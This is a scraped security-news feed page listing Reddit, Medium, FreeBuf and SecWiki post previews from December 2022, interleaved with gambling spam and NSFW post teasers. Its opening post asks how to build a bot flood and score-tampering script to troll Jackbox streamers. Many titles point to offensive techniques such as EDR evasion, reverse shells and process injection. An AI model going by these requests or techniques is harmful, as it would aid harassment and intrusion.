    I am wondering if i could get any help making a jackbox audience script that lets me join with like a million instances and have them all go for the same choice... I am also wanting to be able to change scores in jackbox games to troll streamers... I saw someone do that on a stream yesterday, million bots and taking away like 1 trillion points... ​ How do i make this? I was thinking like a GUI submitted by /u/NaughtiiiiMari [link] [comments]
  • Open

    Just some pics and videos of us having sex
    Please be kind and let us know what you enjoyed 😉 submitted by /u/nosnebn6 [link] [comments]
    christmas worksheets/coloring pages!
    submitted by /u/lambda077 [link] [comments]
    coloring pages!
    submitted by /u/lambda077 [link] [comments]
  • Open

    Property-based and Generative testing for Microservices
    The software development cycle for microservices generally include unit testing during the development where mock implementation for the… Continue reading on Medium »
  • Open

    Property-based and Generative testing for Microservices
    The software development cycle for microservices generally include unit testing during the development where mock implementation for the… Continue reading on Medium »
  • Open

    Project Proposal for me to go back to school
    To start, I am 26 years old and would like to go back to school for a Master's in Cyber Security with the company's tuition reimbursement program. I would not spend a dime out of my own pocket. To get this approved, the company said I needed to write a project proposal for them. What do you guys think? Good enough to hit send? ​ Dear [Company Name], I am writing to propose that I return to school to pursue a Master's degree in Cyber Security. I believe that this investment in my education will have significant benefits for both myself and the company. Obtaining a Master's degree in Cyber Security will give me a comprehensive understanding of the latest technologies and best practices in the field. This will make me a valuable asset to the company as I will be able to better protec…
    HOWTO Browse Websites Behind The Great Firewall of China?
    Hi, trying to go from not China into China to view some websites that are blocked by the Great Firewall of China. There's a few websites that recommend this V-P-N or that V-P-N. Those products give a Chinese IP, but timeout when trying to view a Chinese website that's behind the great firewall. Tried a few SOCKS proxy sites that also didn't work. Any ideas? submitted by /u/opethharlequinforest [link] [comments]
    DNS interaction via XML-RPC API
    Hello good folks , while testing a site I found DNS interaction via XML - RPC API .Pingback.ping method is enabled on that site so I used interactsh-client URL as callback example:- pingback.ping interactsh-client url here I sent this request through burp repeater and response code was 200. I got response of DNS interaction on the cli interface of interactsh as well. But I know this can't be submitted. Is there anything else to share ? Thanks submitted by /u/ArchurCl4w [link] [comments]
    Standardized Tool Kits
    How often do Red Teams and Pen Test Organizations have their own tools and TTPs? Or is it more often the responsibility of each individual to bring their own tools and TTPs? submitted by /u/dfclin073 [link] [comments]
  • Open

    SecWiki News 2022-12-20 Review
    WebSocket通信安全概览 by 路人甲 红队Java代码审计生命周期 by 路人甲 SecWiki周刊(第459期) by ourren [HTB] Olympus Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-20 Review
    WebSocket通信安全概览 by 路人甲 红队Java代码审计生命周期 by 路人甲 SecWiki周刊(第459期) by ourren [HTB] Olympus Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Multi Reverse Shell Handler
    Introduction Continue reading on Medium »
    [RedDev #5] Rundll32 COM Hijack executor in C++
    Simple explanation on how does the COM executed via rundll32 with switch -sta / -localserver Continue reading on Medium »
    HACKING CYBORG[TryHackMe] : CTF CHALLENGE
    Arise young hacker ! you’ve been introduced to the techniques to hack a machine. Good. Now it’s time to hack Cyborg- that human machine of… Continue reading on Medium »
    Grouping your penetration testing artifacts [the art of organized testing]
    Storing testing artifacts and screenshots is important for several reasons. Firstly, it allows for the documentation and analysis of the… Continue reading on System Weakness »
  • Open

    Building a Strong Foundation With the Information Security Accelerator
    Bottom Line Up Front Common threats like malware, ransomware, web application hacking, insider and privilege misuse, and targeted intrusions don’t have to spell disaster. Mid-market companies and small-to-medium businesses (SMBs) can cut through the confusion of how to build a solid security program. Our Information Security Accelerator service is designed to help your organization chart... The post Building a Strong Foundation With the Information Security Accelerator appeared first on TrustedSec.
  • Open

    【原创】一文搞懂缓冲区溢出漏洞
    希望该篇文章能够由浅入深把缓冲区溢出彻底解释清楚。
    如何使用ADFSRelay分析和研究针对ADFS的NTLM中继攻击
    ADFSRelay是一款功能强大的概念验证工具,可以帮助广大研究人员分析和研究针对ADFS的NTLM中继攻击。
    如何使用AzureGraph通过Microsoft Graph收集Azure活动目录信息
    AzureGraph是一款针对Azure活动目录的信息收集工具,该工具基于Microsoft Graph实现其功能。
    斗象科技"DayBreak破晓"业界首款社区版BAS正式发布
    社区版BAS防御有效性验证平台,免费下载,快来体验吧!
    英国电信法规最高罚10%,网安法也大幅提升处罚,全球合规趋严?
    两国的网络安全法案修改,也表明未来网络安全法规将不断与时俱进并日趋严格。
    微软发现 macOS 存在漏洞,允许攻击者绕过安全审查部署恶意软件
    攻击者可以利用该漏洞,绕过 Gatekeeper 安全机制应用程序,在易受攻击的 macOS 设备上部署恶意软件。
    德国连锁酒店 H-Hotels遭Play 勒索软件攻击,客户数据疑泄露
    近日,Play 勒索软件团伙发表称对 H-Hotels (h-hotels.com) 进行了网络攻击,该攻击导致该公司通信中断。
    FreeBuf早报 | 2022年十大数据泄露事件;尽管经济状况恶化,但网络安全市场仍增长16%
    ,尽管经济状况恶化,但网络安全市场在今年第 3 季度仍增长了 15.9%。
    一文看懂“数据二十条”,构建数据基础制度体系
    把安全贯穿数据治理全过程,构建政府、企业、社会多方协同的治理模式,创新政府治理方式,明确各方主体责任和义务。
    《堡垒之夜》开发商因侵犯隐私和黑暗模式,支付5.2亿美元天价和解金
    这是FTC有史以来最大的行政命令和历史上最大的游戏案件退款金额。
  • Open

    Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine
    Ukraine and its cyber domain has faced ever-increasing threats from Russia. We give a timely update on APT group Trident Ursa (aka Gamaredon). The post Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine appeared first on Unit 42.
  • Open

    Everything about Cookie and Its Security
    What is a cookie and why is it used? Continue reading on InfoSec Write-ups »
    TryHackMe writeup: Daily Bugle
    The Daily Bugle is a fake news paper in the world of Spiderman. In this article, it’s gonna get r00ted and pwn’d hard! Continue reading on InfoSec Write-ups »
    Write-up: Authentication bypass via encryption oracle @ PortSwigger Academy
    No content preview
    Using ChatGPT to Create DarkWeb Monitoring Tool
    No content preview
    How I found my first RCE? A simple one…
    No content preview
    Use nim compiled language to evade Windows Defender reverse shell detection
    No content preview
    Advent of Cyber 2022 [Day 16] Secure Coding | SQLi’s the king, the carolers sing | Simple Write up
    No content preview
    Burp Suite Extension Development
    No content preview
    Advent of Cyber 2022 [Day 17] Secure Coding | Filtering for Order Amidst Chaos-Simple Write up
    No content preview
    CVE-2022-42710: A journey through XXE to Stored-XSS
    No content preview
  • Open

    Everything about Cookie and Its Security
    What is a cookie and why is it used? Continue reading on InfoSec Write-ups »
    TryHackMe writeup: Daily Bugle
    The Daily Bugle is a fake news paper in the world of Spiderman. In this article, it’s gonna get r00ted and pwn’d hard! Continue reading on InfoSec Write-ups »
    Write-up: Authentication bypass via encryption oracle @ PortSwigger Academy
    No content preview
    Using ChatGPT to Create DarkWeb Monitoring Tool
    No content preview
    How I found my first RCE? A simple one…
    No content preview
    Use nim compiled language to evade Windows Defender reverse shell detection
    No content preview
    Advent of Cyber 2022 [Day 16] Secure Coding | SQLi’s the king, the carolers sing | Simple Write up
    No content preview
    Burp Suite Extension Development
    No content preview
    Advent of Cyber 2022 [Day 17] Secure Coding | Filtering for Order Amidst Chaos-Simple Write up
    No content preview
    CVE-2022-42710: A journey through XXE to Stored-XSS
    No content preview
  • Open

    Everything about Cookie and Its Security
    What is a cookie and why is it used? Continue reading on InfoSec Write-ups »
    TryHackMe writeup: Daily Bugle
    The Daily Bugle is a fake news paper in the world of Spiderman. In this article, it’s gonna get r00ted and pwn’d hard! Continue reading on InfoSec Write-ups »
    Write-up: Authentication bypass via encryption oracle @ PortSwigger Academy
    No content preview
    Using ChatGPT to Create DarkWeb Monitoring Tool
    No content preview
    How I found my first RCE? A simple one…
    No content preview
    Use nim compiled language to evade Windows Defender reverse shell detection
    No content preview
    Advent of Cyber 2022 [Day 16] Secure Coding | SQLi’s the king, the carolers sing | Simple Write up
    No content preview
    Burp Suite Extension Development
    No content preview
    Advent of Cyber 2022 [Day 17] Secure Coding | Filtering for Order Amidst Chaos-Simple Write up
    No content preview
    CVE-2022-42710: A journey through XXE to Stored-XSS
    No content preview
  • Open

    [ NÓNG ] NGÀY 1 THÁNG 1 NĂM 2023 NHẬN LÌ XÌ VÀ TRẢI NGHIỆM GAME MỚI SODO XSST
    🔰Có khả năng GÂY SỐT toàn thị trường cá cược lúc này chính là Sodo XSST. Nhận được lời mời tham dự và chúc mừng Lễ Kỷ Niệm Thành Lập 12… Continue reading on Medium »
    VÀO SOI EM NÀO CÁC ANH ƠI
    🔍Soi Cầu 6666 được coi là một trong những phương pháp chơi lô đề phải thử một lần. Cùng TK88 khám phá ngay hôm nay nhé! 🔍Liên tục cập… Continue reading on Medium »
  • Open

    GoodGames HackTheBox Walkthrough
    Summary GoodGames is a Linux machine and is considered an easy box. but it was tricky indeed. On this box, we will begin with a
    GoodGames HackTheBox Walkthrough
    Summary GoodGames is a Linux machine and is considered an easy box. but it was tricky indeed. On this box, we will begin with a

  • Open

    Adversary catalogue with industry and country mappings?
    Does anybody know of a good data repository that contains a list of threat actors mapped to the countries and industries/sectors that they target. Like what Palo Alto's Unit 42 ATOMs project did for malware (https://unit42.paloaltonetworks.com/atoms/), but for threat actors and APTs. Something like CrowdStrike's Adversary Universe project (https://adversary.crowdstrike.com/), but they only cover a small sample (of 20) threat actors. Surprisingly, MITRE ATT&CK groups doesn't really cover either of these details. MISP project (https://raw.githubusercontent.com/MISP/misp-galaxy/main/clusters/threat-actor.json) has target countries, but doesn't cover industries/sectors. Wondering if anybody knows of any others that would cover both of these? TIA!!! EDIT: When I say MITRE ATT&CK groups don't have these details, I specifically mean they aren't there in any structured format (i.e. it's not indexed in the JSON data as unique data points). In some cases however, these details are included in some of the group descriptions. submitted by /u/drstarskymrhutch [link] [comments]
    Where are traces in attacker's machine stored?
    Where are traces of using kali (cause its the most used by hacker) tools stored inside the system for forensics when the attacker's device is found during an investigation if he didn't delete or wipe them?In other words, where is the evidence of the crime stored inside the system (if he has kali on USB, CD, dual booted or even a VM) . Hope my question is clear. Thank you in advance for your time reading my post. submitted by /u/Big-Status8393 [link] [comments]
    Home PC calls to Letsencrypt.org domains
    I didnt install this certificate and as I understand it is not needed for normal people/pc's. im using protonvpn, theyare also based in switzerland so maybe thats why? but why would my pc need a certificate saying im trusted?? submitted by /u/VeggieReggie808 [link] [comments]
    Is there a name for a service which will send an email if you do not respond within x hours or x days?
    I am urgently looking for the name of the following service: A piece of software/service which will send an email with content, a password for instance as follows: When Bob is not responding within X days with a 'ping' to the service, we assume his hiking trip in the jungle of Borneo went wrong and his trusted companion Alice gets an email which enables her to take control of Bobs systems. I tried googling, I know it exists and there is a name for this type of service, but I cannot find it, I cannot even find commercial services. I am non-native english speaker, perhaps I am using the wrong terms (dutch). I do need it for a friend. I am not an netsec engineer Any help is greatly appreciated! submitted by /u/fritsboks [link] [comments]
    Help desk in Europe with IBM certification
    I thinked to starting my career in IT from HelpDesk with this certification of IBM because CompTIA aren't valuable in Europe, they are more US based. I'm 23 and I attend a evening computer high school for adults who dropped out studies in adolescence. I finish it in 2 years but i want starting to work next year. How do you think about this cert ? https://www.coursera.org/professional-certificates/ibm-technical-support#courses submitted by /u/HelloWorldCLang [link] [comments]
  • Open

    What is OSINT and where to start
    OSINT (Open Source Intelligence) is the process of collecting, analyzing, and disseminating information from publicly available sources… Continue reading on Medium »
    5 Methods for Tracking Planes and Ships That Aren’t Twitter — Rae Baker: Deep Dive
    With the new ban on live-tracking going into effect along with the other constantly shifting changes taking place over on Twitter, I… Continue reading on Medium »
  • Open

    Gatekeeper’s Achilles heel: Unearthing a macOS vulnerability
    Article URL: https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=34059037 Points: 2 # Comments: 0
    Critical Windows code-execution vulnerability went undetected until now
    Article URL: https://arstechnica.com/information-technology/2022/12/critical-windows-code-execution-vulnerability-went-undetected-until-now/ Comments URL: https://news.ycombinator.com/item?id=34056194 Points: 8 # Comments: 0
  • Open

    Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg
    submitted by /u/Void_Sec [link] [comments]
    Beware of this CI/CD vulnerability: GitHub Environment Injection (Google & Apache found vulnerable)
    submitted by /u/roy_6472 [link] [comments]
    EDR evasion with hardware breakpoints
    New research of mine talking about EDR evasion using hardware breakpoints. submitted by /u/Fun_Preference1113 [link] [comments]
    clif - is a command-line application fuzzer in Rust
    submitted by /u/andy-codes [link] [comments]
    MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
    A TP-Link router stack overflow vulnerability patched days before Pwn2Own 2022 (https://twitter.com/_mccaulay/status/1604813519572160513) submitted by /u/ArbitraryWrite [link] [comments]
    Port knocking from the scratch
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Looking for an iCloud account (test, not a real one) with ADP
    For some personnal research, I'm looking for someone that have access to a test iCloud account that has Advanced Data Protection enabled. I'll just need it for a day or two, then I'll be off. I tried changing the address to one of my test account to US, but I got this error from Apple :) : https://imgur.com/a/9uefZme submitted by /u/Loutilout [link] [comments]
    Where are the traces on attacker's machine
    Where are traces of using kali (cause its the most used by hacker) tools stored inside the system for forensics when the attacker's device is found during an investigation if he didn't delete or wipe them?In other words, where is the evidence of the crime stored inside the system (if he has kali on USB, CD, dual booted or even a VM) . Hope my question is clear. Thank you in advance for your time reading my post. submitted by /u/Big-Status8393 [link] [comments]
    Help with CyberChef Challenge #5 CTF
    I've made it this far, and the decoded hex clearly has a bzip2 header, but I think the rest is encoded somehow? I've tried all I can think of for the last day but I cannot get it to spit out anything valid...Thank you! Link to CTF https://preview.redd.it/ytyk68ytzv6a1.png?width=1916&format=png&auto=webp&s=d2b898ed45a02dcf96a9a5ffc1346a04512a5707 submitted by /u/circuitidiot [link] [comments]
    The Dissect Effect - An Open Source IR Framework
    Good morning, Merry Christmas to all of you who celebrate! Here’s a new 13Cubed episode about Dissect -- a powerful, now open source, IR framework. Enjoy! ----- In this episode, we'll take a look at the recently open sourced Dissect incident response framework from Fox-IT. We'll briefly examine the overall capabilities of the software, then we'll install it within a WSL 2 environment, and lastly, we'll take it for a test drive using a Windows Server 2019 disk image. Episode: https://www.youtube.com/watch?v=A2e203LizAM Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
    Second/Third Gen File Carving Tools
    Hi everyone, I’m an undergrad student and am assisting with a research project that involves carving files from a bin file. I’ve used many open source file carving tools (Autopsy, Scalpel, Foremost, etc) but they don’t find anything. I modified Scalpel’s config file to include more file types but got way too many false positives. From what I understand, this can be a problem with all first generation (header-footer based) tools. I’ve been reading about second gen tools which use file structure information and third gen tools which are block content based. I’ve found frameworks for developing such tools but am wondering if there are any pre-existing ones available. Any recommendations are appreciated, they don’t have to be open source/free, it’s also okay if they’re for law enforcement use only. Thank you in advance! submitted by /u/yazzyf [link] [comments]
    Found a USB, want to safely plug it in and inspect
    Any tutorials on setting this up for inspection?? submitted by /u/Bulevine [link] [comments]
  • Open

    Gatekeeper’s Achilles heel: Unearthing a macOS vulnerability
    submitted by /u/SCI_Rusher [link] [comments]
    EDR evasion with hardware breakpoints
    New research of mine talking about hardware breakpoint for EDR evasion submitted by /u/Fun_Preference1113 [link] [comments]
    Port knocking from the scratch
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Paper HackTheBox Walkthrough
    Paper is a Linux machine and is considered an easy box the hack the box. On this box, we will begin with a basic port
    Paper HackTheBox Walkthrough
    Paper is a Linux machine and is considered an easy box the hack the box. On this box, we will begin with a basic port
  • Open

    SecWiki News 2022-12-19 Review
    静态程序分析框架“太阿”的设计之道 by ourren 2022 年 Recorded Future C&C 服务器跟踪报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-19 Review
    静态程序分析框架“太阿”的设计之道 by ourren 2022 年 Recorded Future C&C 服务器跟踪报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Just a little folder full of games I found while following a link on Rogue Basin.
    submitted by /u/fleegle2000 [link] [comments]
  • Open

    Installasi dvwa untuk belajar web penetration testing di docker
    halo semuanya kali ini saya akan sharing tentang bagaimana cara menginstasll dvwa menggunakan docker container, buat temen-temen yang… Continue reading on Medium »
    BUG BOUNTY JOURNEY
    BBJ-101: Continue reading on Medium »
  • Open

    MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
    A TP-Link router stack overflow vulnerability patched days before Pwn2Own 2022 (https://twitter.com/_mccaulay/status/1604813519572160513) submitted by /u/ArbitraryWrite [link] [comments]
  • Open

    ‍IW Weekly #38: Cache Poisoning, XSS Payloads, Akamai and Amazon S3 buckets, Hybrid Fuzzing in…
    No content preview
  • Open

    ‍IW Weekly #38: Cache Poisoning, XSS Payloads, Akamai and Amazon S3 buckets, Hybrid Fuzzing in…
    No content preview
  • Open

    ‍IW Weekly #38: Cache Poisoning, XSS Payloads, Akamai and Amazon S3 buckets, Hybrid Fuzzing in…
    No content preview
  • Open

    FreeBuf早报 | 前Twitter员工因间谍活动被判入狱;特斯拉国内更新
    特斯拉国内更新:哨兵模式调整,增加新的安全功能; iDASH 2022隐私计算大赛——字节跳动Jeddak Team获得佳绩.
    《网络安全标准实践指南—个人信息跨境处理活动安全认证规范V2.0》发布
    《实践指南》规定了跨境处理个人信息应遵循的基本原则、个人信息处理者和境外接收方在个人信息跨境处理活动的个人信息保护等内容。
    谷歌通过客户端加密将 Gmail 安全提升到一个新的高度
    在人们对在线隐私和数据安全的担忧达到历史最高水平之际,这无疑是一个可喜的变化。
    澳大利亚维多利亚州消防救援机构遭到网络攻击
    澳大利亚维多利亚州的消防救援机构服遭到网络攻击,现已关闭其网络,转为手动操作。
    阿里云香港服务器“史诗级”宕机
    阿里云香港地域故障确认系香港PCCW机房制冷设备故障所致,影响香港地域可用区C的云服务器ECS、云数据库、存储产品等云产品使用。
    新型跨平台僵尸网络正感染《我的世界》游戏服务器
    一种名为“MCCrash”的新型跨平台恶意软件僵尸网络正在利用感染 Windows、Linux 和物联网设备来针对《我的世界》服务器。

  • Open

    How did you set up your password manager?
    I stored all my 2FA tokens in my password manager since it still grants most of the 2FA advantages but also makes it a lot easier and more comfortable to use, because all you need is the password manager to log in to something. But I would also like 2FA for the login to my password manager, which would require me to use another app only for one single 2FA token. Or do you think this is unnecessary and I should just stick to my master password? How did you set up your password managers and do you have any recommendations on what the most secure way of using it is? submitted by /u/kdoersing [link] [comments]
  • Open

    Simplified Hacking: O guia definitivo para OSINT
    OSINT (Open Source Inteligence) é uma técnica que consiste do ato de realizar a coleta de informações que são de origem públicas em busca… Continue reading on Medium »
    Identifying Phishing Pages with Shodan
    Methodology Continue reading on Medium »
    Identifying Phishing Pages with Shodan
    Methodology Continue reading on Medium »
    How to find potential profiles of a person across the internet
    Profil3r is a free and open-source tool available on GitHub. It is used to find potential profiles of a person on different sites. This… Continue reading on Medium »
    SPY NEWS: 2022 — Week 50
    Summary of the espionage-related news stories for the Week 50 (December 11–17) of 2022. Continue reading on Medium »
  • Open

    Day 3 — Next Level Font Obfuscation
    submitted by /u/Exact-Practice-8658 [link] [comments]
    Venom is a library that meant to perform evasive communication using stolen browser socket.
    submitted by /u/Idov31 [link] [comments]
    Your Car is Trackable by Law TPMS tracking for 30$
    submitted by /u/Exact-Practice-8658 [link] [comments]
    Gepetto - An IDA plugin which queries OpenAI's davinci-003 language model to speed up reverse-engineering
    submitted by /u/galaris [link] [comments]
  • Open

    gh0x0st/wanderer: An open-source process injection enumeration tool written in C#
    submitted by /u/dmchell [link] [comments]
    namazso/linux_injector: A simple ptrace-less shared library injector for x64 Linux
    submitted by /u/dmchell [link] [comments]
  • Open

    Revolutionize Your Hacking Skills with ChatGPT: The AI Assistant That Will Take Your Cybersecurity…
    As a penetration tester or bug bounty hunter, you know the importance of having the right tools at your disposal. ChatGPT is a powerful AI… Continue reading on Medium »
    How Bug Bounty Programs can Help Improve the Hospital Security
    Healthcare security teams are under extreme pressure to protect their surroundings from an increasing number of threats. Continue reading on Bug Zero »
    Social Engineering: What Is Social Engineering? | Part 2
    In the last blog, we briefly overview social engineering and how it can be used in real life. In this blog, we'll learn about what is… Continue reading on Medium »
    Recon for Ethical Hacking — Sorces and Checklists
    Search engine: Continue reading on Medium »
    Burp Suite Android Emulator
    Guide to setup Burp Suite on your Android Emulator Continue reading on Medium »
    How I was able to steal users credentials via Swagger UI DOM-XSS
    Hello guys, today I’m gonna explain how i got DOM-XSS from Swagger-UI and exploit it to make HTML and JAVASCRIPT injections to create a… Continue reading on Medium »
  • Open

    TCU Passware (2022DEC18)
    The latest "TCU Passware" (2022DEC18) has been released. This live distro automatically initializes the Passware Linux agent and adds it to your Passware cluster. It includes a SSH server (u:user, p:live) so you can login to debug the agent if required. It also has hashcat included so if you stop the Passware Linux agent you can use it for direct GPU accelerated hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1BChc2kbErGPOFrDnvC8EO55PIWnuL-vX submitted by /u/atdt0 [link] [comments]
    TCU Hashtopolis (2022DEC18)
    The latest "TCU Hashtopolis" (2022DEEC18) has been released. This live distro automatically initializes the Hashtopolis Linux agent and adds it to your Hashtopolis cluster. It includes a SSH server (u:user, p:live) so you can login to debug the agent if required which can be particularly helpful when a Hashtopolis task fails to benchmark your agent and the agent pulls itself out of the cluster. It also has hashcat included so if you stop the Hashtopolis Linux agent you can use it for direct GPU accelerated hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1xkDBNCr-KBg8FTMvTc70sxm0nr-6qYCG?usp=sharing submitted by /u/atdt0 [link] [comments]
    TCU Live: 2022DEC18 (latest release)
    The latest version of "TCU Live" (2022DEC18) has been released. It's running the latest Debian sid packages, the Linux 6.0.0 kernel for modern hardware support, and updated third party packages such as the Tor Browser, volatility, guestmount, git, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
    The Windows Process Journey — LogonUI.exe (Windows Logon User Interface Host)
    submitted by /u/boutnaru [link] [comments]
    Memory Forensics Question
    I recently had to conduct a compromise assessment on an Windows 10 device. When looking at the processes a flag was raised when wininit.exe had a parent of lsass.exe. My understanding is that wininit.exe has a parent of smss.exe, but smss.exe terminates, so is wininit.exe doesn't have a parent that can be seen. lsass.exe is actual a child of wininit.exe. I decided to take a look at some other memory dumps that I had lying around. Straight away I found one which had services.exe as the parent of wininit.exe where, again, services.exe should be a child of wininit.exe. This started me wondering what was going on. My best theory is that the PID of smss.exe is being reused after it terminates and is being reissued to processes which start after it terminates. So smss.exe has a PID of 150 when it creates wininit.exe leaving wininit.exe with a PPID of 150. Smss.exe then terminates leaving PID free to be reused. Wininit.exe then creates a child process which is then issued with a PID of 150. Is this a viable theory, or am I barking up the wrong tree? submitted by /u/curlydog998 [link] [comments]
  • Open

    CVE – A Collaborative Virtual Environment
    Article URL: https://cve.sourceforge.net/ Comments URL: https://news.ycombinator.com/item?id=34040379 Points: 1 # Comments: 0
  • Open

    FreeBuf早报 | 微软通报56个产品安全漏洞;乌克兰政府网站再次被攻破
    微软官方发布了多个安全漏洞的公告,其中微软产品本身漏洞56个,成功利用上述漏洞的攻击者可以在目标系统上执行任意代码、获取用户数据,提升权限等。
    SharpSCCM:一款利用SCCM实现横向渗透的强大工具
    该工具主要利用了微软终端配置管理器(SCCM)来实现其功能,并能够通过访问SCCM管理终端GUI来实现横向渗透和凭证收集。
    内网渗透-1.内网基础及域环境搭建
    内网也指局域网是指在某一区域内由多台计算机互连而成的计算机组,组网范围通常在数千米以内。
    Pyramid:一款专为红队设计的EDR绕过工具
    该工具专为红队研究人员设计,可以帮助广大研究人员通过利用Python的一些规避属性并尝试让EDR将其视为合法的Python应用程序。
    从Tomcat源码中寻找request路径进行注入
    本文分享了从Tomcat源码中寻找request路径进行注入的操作过程,仅供大家参考。
    OS丛话(计算篇)
    OS丛话
    OS丛话(算法篇)
    操作系统这门课,从应试的角度来讲,无非就是几个算法和几个问题。
    网安人的期末考试
    古人云:“功夫再高,也怕菜刀”,技术再强的大佬也要参加期末考试,更何况是我这种菜鸡。
  • Open

    SecWiki News 2022-12-18 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-18 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    [user_oidc] Stored XSS via Authorization Endpoint - Safari-Only
    Nextcloud disclosed a bug submitted by lauritz: https://hackerone.com/reports/1687410 - Bounty: $100
    [user_oidc] Unencrypted Communications
    Nextcloud disclosed a bug submitted by lauritz: https://hackerone.com/reports/1687005
  • Open

    KHAI TRƯƠNG THƯƠNG HIỆU ĐỘC QUYỀN SODO XSST
    >> NGÀY 1 THÁNG 1 NĂM 2023. ♦️Cổng game độc quyền mới đến từ Sodo66, cùng HR99 đến chung vui và ăn mừng lễ kỷ niệm 12 năm thành lập Tập… Continue reading on Medium »
  • Open

    Index of Mistress
    submitted by /u/damschreeuwer [link] [comments]
    or for skittish !! Viewer discretion is advised.
    NSFW Short movie clips of some very strange perversion. http://www.donnerpartycatering.com/uploads/ submitted by /u/BustaKode [link] [comments]
  • Open

    Bug Bounties: Past, Present, Future...
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Scheduled Tasks for Cyber Security Professionals
    What are Scheduled Tasks? Continue reading on System Weakness »
    Scheduled Tasks for Cyber Security Professionals
    What are Scheduled Tasks? Continue reading on Medium »
  • Open

    Six Year Old SQL Injection Vulnerability in Knex.js
    Article URL: https://www.ghostccamm.com/blog/knex_sqli/ Comments URL: https://news.ycombinator.com/item?id=34034498 Points: 1 # Comments: 0

  • Open

    Bug Bounty Nedir? Bug Bounty Platformları Ve Buralardan Ödül Kazanma Sistemleri Nelerdir?
    Selam tüm siber güvenlik meraklısı dostlara. Piyasaların amansızca darbe aldığı, yatırımların sürekli zararda olduğu, fakat mutlaka… Continue reading on Medium »
    HTTP Analizi
    HTTP nedir Continue reading on Medium »
    No rate limit vulnerability on #Amazon
    Hello guys, Vedavyasan here👽✨. Continue reading on System Weakness »
    The Dark Art of RFI: A Step-by-Step Guide to Obtaining a Reverse Shell!
    Hello lamers, today we will talk about file inclusion and how to use a remote file inclusion (RFI) vulnerability to gain a reverse shell. Continue reading on Medium »
    BUG BOUNTY JOURNEY
    BBJ101: Continue reading on Medium »
  • Open

    A list of search engines for Marketers/Pen-testers/OSINT Engineers — Part-2
    Greetings, Medium. Continue reading on Medium »
    Simplified Hacking: Principais Ferramentas e serviços de OSINT
    OSINT (open source intelligence ou informação de fontes abertas) é o termo usado para descrever informação obtida em fontes disponíveis ao… Continue reading on Medium »
    Infectious File Writeup
    PROLOGUE Continue reading on The Sleuth Sheet »
    The Archive Writeup
    PROLOGUE Continue reading on The Sleuth Sheet »
  • Open

    Overview eJPT - Matheus Gutierre
    17th of December 2022 — O dia em que fui aprovado na eLean Junior Prenetration Tester. Essa prova consiste em 20 questões, onde a taxa… Continue reading on Medium »
    In-Depth with the Tools of Kali Linux: Sharpening the Axe
    Very recently, I accomplished two incredible feats: Continue reading on Medium »
  • Open

    Pandora HackTheBox Walkthrough
    Summary Pandora is a Linux machine and is considered an easy box by the hack the box but indeed it is not. With this box,
    Pandora HackTheBox Walkthrough
    Summary Pandora is a Linux machine and is considered an easy box by the hack the box but indeed it is not. With this box,
  • Open

    xplico
    I'm new to digital forensic. I'm trying to analyze official xplico sample captures but I get everywhere results 0. I have no idea what am I doing wrong. Also looking for some other samples, any advice appreciated. Thanks submitted by /u/Powerful-Ad-9564 [link] [comments]
    Link for Magnet Acquire?
    Could anyone provide me with a download link for Magnet Acquire? I filled out the request form but I need to make an image of a phone now and can't really wait the 24 hours I've read it takes for them to get back to you. Either that or if someone can direct me to instructions on how to get an image of a locked Android phone. Either would be greatly appreciated. I'm still going to work my google-fu but it never hurts to ask. submitted by /u/thenebular [link] [comments]
  • Open

    WinVerifyTrust Signature Validation CVE-2013-3900 Mitigation && Windows Speculative Execution Configuration Check
    Hi, ​ We have installed all up-to-date updates for 2016 , 2019 and 2022 OS. My question is : even though I have installed all updates ,Do I have to set in the below regedit settings? ​ According MS Arcticle ( https://support.microsoft.com/en-au/topic/2f965763-00e2-8f98-b632-0d96f30c8c8e). ​ Even though if I installed all updates for 2016 / 2019 / 2022 , Do I have to set the below regedit settings ? Correct ? ​ Because , according to the MS article , some of the CVEs are default mitigation for 2019 / 2022 OS. ​ New-Item -Name "Config" -Path 'hklm:\Software\Microsoft\Cryptography\Wintrust\' -Type Directory -Force | Out-Null New-ItemProperty -Path "hklm:\Software\Microsoft\Cryptography\Wintrust\Config\" -Name " EnableCertPaddingCheck " -Value "1" -PropertyType String -Force To protect against all of them (with hyperthreading enabled), reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 72 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f ​ If anyone has any ideas for this I would love to hear them. ​ Thanks, submitted by /u/maxcoder88 [link] [comments]
  • Open

    SecWiki News 2022-12-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

